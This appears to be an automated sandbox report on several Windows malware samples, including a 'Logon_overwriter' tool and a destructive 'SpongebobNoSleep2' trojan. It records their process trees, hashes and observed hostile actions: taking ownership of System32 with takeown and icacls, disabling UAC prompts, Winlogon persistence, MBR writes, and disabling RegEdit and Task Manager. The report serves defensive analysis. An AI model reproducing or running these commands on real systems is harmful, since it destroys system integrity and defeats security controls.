US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp

Files

memory/3236-0-0x0000000000400000-0x00000000007BF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\44D9.tmp\SpongebobFuck.cmd

MD5 7a918ed93f7fb297e05464edccc46756
SHA1 9464288fed7ba5d88928265882def5e05ffbe7db
SHA256 82fcb47b437dc1bedb77648755770b7cd9a29342fd2ab972c8bd063968d04604
SHA512 cb70d6023b4bf23f35646e399c4ca7f0ab11ebf0a1e44cf0627afaa4025676c2a20ab82ffa28ed4a196dc8cf56b33b104bf457cf21d750a163955927dcba3cb1

memory/3236-12-0x0000000000400000-0x00000000007BF000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win10v2004-20240226-en

Max time kernel

135s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\Logon_overwriter.exe"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\Logon_overwriter.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\LogonUI.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\Logon_overwriter.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\Logon_overwriter.exe

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\obj\Debug\Logon_overwriter.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant "Admin:F"

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 104.241.123.92.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 32.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 211.135.221.88.in-addr.arpa udp

Files

memory/1628-0-0x0000000000550000-0x000000000055E000-memory.dmp

memory/1628-1-0x00007FFA7CD50000-0x00007FFA7D811000-memory.dmp

memory/1628-2-0x00000000026D0000-0x00000000026E0000-memory.dmp

memory/1628-5-0x00007FFA7CD50000-0x00007FFA7D811000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

122s

Max time network

128s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Form1.vbs"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\Form1.vbs"

Network

N/A

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240221-en

Max time kernel

120s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\LogonUI.exe C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe

"C:\Users\Admin\AppData\Local\Temp\source\Logon_overwriter\Logon_overwriter\bin\Debug\Logon_overwriter.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant "Admin:F"

Network

N/A

Files

memory/1040-0-0x0000000000940000-0x000000000094E000-memory.dmp

memory/1040-1-0x000007FEF5A10000-0x000007FEF63FC000-memory.dmp

memory/1040-2-0x00000000004B0000-0x0000000000530000-memory.dmp

memory/1040-4-0x000007FEF5A10000-0x000007FEF63FC000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-18 04:51

Reported

2024-03-18 04:56

Platform

win7-20240215-en

Max time kernel

147s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\windows\\winbase_base_procid_none\\secureloc0x65\\WinRapistI386.vbs\"" C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A

Disables Task Manager via registry modification

evasion

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\145B.tmp\mbr.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Desktop\Wallpaper = "c:\\bg.bmp" C:\Windows\system32\reg.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe C:\Windows\system32\cmd.exe N/A
File created \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav C:\Windows\system32\cmd.exe N/A
File opened for modification \??\c:\windows\winbase_base_procid_none\secureloc0x65\mainbgtheme.wav C:\Windows\system32\cmd.exe N/A
File created \??\c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\Cursors\Hand = "C:\\Windows\\winbase_base_procid_none\\secureloc0x65\\rcur.cur" C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\145B.tmp\MainWindow.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2212 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe C:\Windows\system32\wscript.exe
PID 2212 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe C:\Windows\system32\wscript.exe
PID 2212 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe C:\Windows\system32\wscript.exe
PID 2212 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe C:\Windows\system32\wscript.exe
PID 1048 wrote to memory of 712 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\145B.tmp\mbr.exe
PID 1048 wrote to memory of 712 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\145B.tmp\mbr.exe
PID 1048 wrote to memory of 712 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\145B.tmp\mbr.exe
PID 1048 wrote to memory of 712 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\145B.tmp\mbr.exe
PID 1048 wrote to memory of 924 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1048 wrote to memory of 924 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1048 wrote to memory of 924 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 924 wrote to memory of 1388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 924 wrote to memory of 1388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 924 wrote to memory of 1388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 924 wrote to memory of 1756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1756 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1864 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 2244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 2244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 2244 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 828 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 2424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 2424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 2424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 648 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 2520 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 452 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 2492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 2492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 2492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 1708 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 2152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 924 wrote to memory of 2152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe

"C:\Users\Admin\AppData\Local\Temp\SpongebobNoSleep2.exe"

C:\Windows\system32\wscript.exe

"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\145B.tmp\145C.tmp\145D.vbs //Nologo

C:\Users\Admin\AppData\Local\Temp\145B.tmp\mbr.exe

"C:\Users\Admin\AppData\Local\Temp\145B.tmp\mbr.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\145B.tmp\tools.cmd" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Users\Admin\AppData\Local\Temp\145B.tmp\MainWindow.exe

"C:\Users\Admin\AppData\Local\Temp\145B.tmp\MainWindow.exe"

C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe

"C:\Users\Admin\AppData\Local\Temp\145B.tmp\gdifuncs.exe"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\145B.tmp\145C.tmp\145D.vbs

MD5 b893c34dd666c3c4acef2e2974834a10
SHA1 2664e328e76c324fd53fb9f9cb64c24308472e82
SHA256 984a07d5e914ed0b2487b5f6035d6e8d97a40c23fa847d5fbf87209fee4c4bbc
SHA512 98a3413117e27c02c35322e17c83f529955b83e72f2af7caaaff53099b583cd241cec95e70c3c0d6d440cb22cf0109d4e46dfda09ef2480427e9a9ab7a4c866b

C:\Users\Admin\Desktop\SPONGEBOB_IS_WATCHING_YOU 5.txt

MD5 bb6d68d7181108015cd381c28360dfc4
SHA1 192c34b9cba6f9c4b742f2b70d9731b8ba2ac764
SHA256 aea8fb9235900760ac374c6a4a10fba62c2a0ef5bea2dd7ef4db70fe55e0b317
